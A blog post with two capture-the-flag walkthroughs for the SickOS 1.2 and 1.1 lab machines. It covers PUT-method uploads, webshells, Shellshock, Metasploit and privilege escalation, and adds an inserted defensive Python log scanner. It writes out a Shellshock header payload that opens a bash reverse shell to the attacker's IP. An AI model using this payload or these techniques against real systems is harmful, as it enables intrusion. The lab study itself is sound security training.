Monday, June 11, 2018

SickOS 1.2


SICKOS 1.2


- Layout for this exercise:





1 - INTRODUCTION


- The goal of this exercise is the study of the hacking process for the vulnerable machine SickOS 1.2:




- SickOS 1.2 can be downloaded from here:

https://www.vulnhub.com/entry/sickos-12,144/


- Once downloaded and extracted with VMware:





2 - ENUMERATION

- Using netdiscover, we notice that the only IP address on the local network associated with VMware is 192.168.1.16, so it should correspond to the vulnerable machine SickOS 1.2:






- Scanning with Nmap:




- Connecting to the web service:




- Viewing the source, there is nothing interesting:





- Scanning the web content with dirb:





- Going to the /test folder:





- curl shows that the PUT method is allowed, meaning that we can create a resource in the web folder /test:






3 - EXPLOITATION

- Using the -X option with the PUT method, let's try to create a simple text file and upload it to the web folder /test:











- Once we see that the upload is successful, let's try some trickier uploads, for instance a cmd.php file that lets us execute PHP code:




- Listing with ls -la:





- Opening /etc/passwd with cat:




- Using which, let's discover whether netcat is available on the victim machine:





3.1 - Exploiting with curl and netcat

- Taking advantage of this Python reverse shell and percent-encoding it:

http://pentestmonkey.net/cheat-sheet/shells/reverse-shell-cheat-sheet

https://en.wikipedia.org/wiki/Percent-encoding




- Setting a listening session on port 443:




- Running the reverse shell with curl:




- A limited shell is achieved:





3.2 - Exploiting with Command Injection

- Another alternative would be injecting the Python script directly via the browser.

- First, setting a listening session on port 443:




- Passing the Python script directly via the browser:




- The limited shell is again achieved:





3.3 - Exploiting with Metasploit

- Setting a Metasploit handler session on port 443:






- Executing the reverse shell script via curl:




- A limited shell is achieved:




- Now, before starting the privilege escalation process, let's background this Metasploit session for later use:





4 - PRIVILEGE ESCALATION

- Following these directions for privilege escalation on a Linux machine:

https://blog.g0tmi1k.com/2011/08/basic-linux-privilege-escalation/


- Searching for cron.daily:






- cron.daily uses an outdated version of chkrootkit:







- Looking for related vulnerabilities:









- Searching with Metasploit, we find an exploit:






- Setting options for the exploit:




- One of the required options is a session, which corresponds to session 1, backgrounded at point 3.3 of this exercise:




- Running the exploit, the privilege escalation succeeds and a root shell is achieved:






5 - CAPTURING THE FLAG

- Going to the /root folder:










Saturday, June 9, 2018

SickOS 1.1


SICKOS 1.1

- Layout for this exercise:




1 - INTRODUCTION

- The goal of this exercise is the study of the hacking process for the vulnerable machine SickOS 1.1:

- SickOS 1.1 can be downloaded from here:

https://www.vulnhub.com/entry/sickos-11,132/



- Once downloaded and extracted with VMware:




2 - ENUMERATION

- Using netdiscover, we notice that the only IP address on the local network associated with VMware is 192.168.1.15, so it should correspond to the vulnerable machine SickOS 1.1:






- Scanning with Nmap, there are 2 open ports: 22 (ssh) and 3128 (Squid http-proxy):




- Configuring the Firefox connection settings for the discovered HTTP proxy (192.168.1.15:3128):





- Connecting with the browser:




- Viewing the source, there is nothing interesting:




- Let's explore the website structure with dirb:




- Looking at the robots.txt file:




- Exploring the folder /wolfcms:





- Using dirb against wolfcms:




- Looking inside the public folder:





- Using nikto to discover potential vulnerabilities:





- The most remarkable result is that /cgi-bin/status is vulnerable to Shellshock:





3 - EXPLOITATION

- Let's try two ways to exploit the vulnerable machine.

3.1 - Uploading a webshell

- Googling for Wolf CMS vulnerabilities:









- Going back to /wolfcms we learn that there is an Administrator:



- Reading from the previous description of the vulnerability:




- Let's explore the admin option:





- Trying admin:admin, the authentication works:







- Going to the Files tab there is an Upload File function:







- At this point, why not upload a webshell?

- Kali Linux ships some webshells:




- For instance, let's explore php-reverse-shell.php:

- Opening the file, we see that there are two parameters that must be changed or adapted to our needs (the IP and port to connect to):







- Copying the webshell to a working folder so that we can manipulate it without losing the original version:






- Opening the webshell and modifying IP and port:







- Now it is ready to be uploaded to the vulnerable machine:
















- We find php-reverse-shell.php at the /public folder:




- Before running it, let's establish a netcat listening session on port 3333:







- Running the webshell:



- The attack is successful, and a limited shell is achieved at the attacker's side:





3.2 - Shellshock

- Now, let's try to exploit the site by taking advantage of the Shellshock vulnerability:

https://metalkey.github.io/shellshock-explained--exploitation-tutorial.html
https://blog.cloudflare.com/inside-shellshock/

- We can confirm that the CGI script uses bash as its interpreter, because the path returns the uptime/uname output inside a JSON string:




- Setting up a netcat listening session on port 4444:




- Let's craft a curl command to achieve a reverse shell:

https://curl.haxx.se/docs/manpage.html

https://www.surevine.com/shellshocked-a-quick-demo-of-how-easy-it-is-to-exploit/


- The parameters used in this case:
  • -x (proxy) = 192.168.1.15:3128
  • -H (header) = User-Agent ignored; /bin/bash -i>& /dev/tcp/192.168.1.17/4444 0>&1
  • target = http://192.168.1.15/cgi-bin/status
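As an added defender-side example (not part of the original post), the following Python script scans web server access log lines in the combined log format for the three request patterns these two write-ups rely on: a Shellshock function-definition prefix in the User-Agent or Referer header (this section), a PUT that the server accepted under the web root, and a percent-encoded interpreter command in the query string (the cmd.php and curl steps of SickOS 1.2). The log lines are constructed, and the regexes are heuristics written here, not signatures from any product.

```python
import re
from urllib.parse import unquote

# Constructed sample lines in combined log format; not taken from the page.
SAMPLE_LOG = """\
192.168.1.17 - - [09/Jun/2018:10:01:02 +0000] "GET /cgi-bin/status HTTP/1.1" 200 512 "-" "Mozilla/5.0"
192.168.1.17 - - [09/Jun/2018:10:01:05 +0000] "GET /cgi-bin/status HTTP/1.1" 200 0 "-" "() { :;}; /usr/bin/id"
192.168.1.17 - - [11/Jun/2018:11:20:30 +0000] "PUT /test/cmd.php HTTP/1.1" 201 0 "-" "curl/7.58.0"
192.168.1.17 - - [11/Jun/2018:11:21:00 +0000] "GET /test/cmd.php?cmd=python%20-c%20%27import%20socket%27 HTTP/1.1" 200 10 "-" "curl/7.58.0"
192.168.1.17 - - [11/Jun/2018:11:21:05 +0000] "GET /index.php?page=about HTTP/1.1" 200 1024 "-" "Mozilla/5.0"
"""

# Combined log format: ip ident user [ts] "METHOD path proto" status bytes "referer" "user-agent"
LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] "(?P<method>[A-Z]+) (?P<path>\S+)[^"]*" '
    r'(?P<status>\d{3}) \S+ "(?P<referer>[^"]*)" "(?P<ua>[^"]*)"$'
)
# Bash exported-function prefix that Shellshock abuses when a CGI copies a header into its environment.
SHELLSHOCK_RE = re.compile(r'\(\)\s*\{')
# An interpreter given an inline script/command, or bash's /dev/tcp pseudo-device, inside the request path.
CMD_RE = re.compile(r'\b(?:python|perl|php|bash|sh|nc)\b.*\s-[ce]\s|/dev/tcp/', re.IGNORECASE)
WRITE_METHODS = {"PUT", "DELETE", "MOVE", "COPY"}


def analyse(line):
    """Return the list of finding tags for one log line, or None if the line does not parse."""
    m = LOG_RE.match(line.rstrip("\n"))
    if not m:
        return None
    f = m.groupdict()
    findings = []
    if SHELLSHOCK_RE.search(f["ua"]) or SHELLSHOCK_RE.search(f["referer"]):
        findings.append("shellshock-header")
    # A 2xx answer to a write method means the server created or changed a resource under the web root.
    if f["method"] in WRITE_METHODS and f["status"].startswith("2"):
        findings.append("write-method-accepted")
    # Decode %xx escapes before matching: the write-up passed its payload percent-encoded through curl.
    if CMD_RE.search(unquote(f["path"])):
        findings.append("command-in-query")
    return findings


def scan(text):
    """Return (line_number, findings) for every line that raised at least one finding."""
    hits = []
    for n, line in enumerate(text.splitlines(), 1):
        found = analyse(line)
        if found:
            hits.append((n, found))
    return hits


if __name__ == "__main__":
    for n, found in scan(SAMPLE_LOG):
        print(f"line {n}: {', '.join(found)}")
```

Note that the Squid proxy in this lab keeps its own access.log in a different format; the script expects the web server's log, which is where the injected User-Agent header is recorded.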





- A limited shell is achieved at the attacker's side:





4 - PRIVILEGE ESCALATION

- Listing the folder /var/www:




- Listing wolfcms:

















- Opening config.php we find interesting credentials for the user root:




- Trying to use the root credentials to achieve a shell, we find that the current shell does not allow using the sudo command:




- Spawning a tty terminal so that we can run a /bin/bash shell:






- Trying again, su works but the authentication fails:





- Remembering the current user:




- Let's switch to another user, for instance sickos:




- Now the authentication is correct:




- Finally a root shell is achieved:




- Also, we could reach the same point by SSH-ing with the sickos user account:







- Surprisingly, sickos is a full sudoer:








- Also:





5 - CAPTURING THE FLAG

- Reading the flag:




- By the way, the flag's name is an MD5 hash:





- Looking it up in an MD5 reverse-lookup table gives bleh!!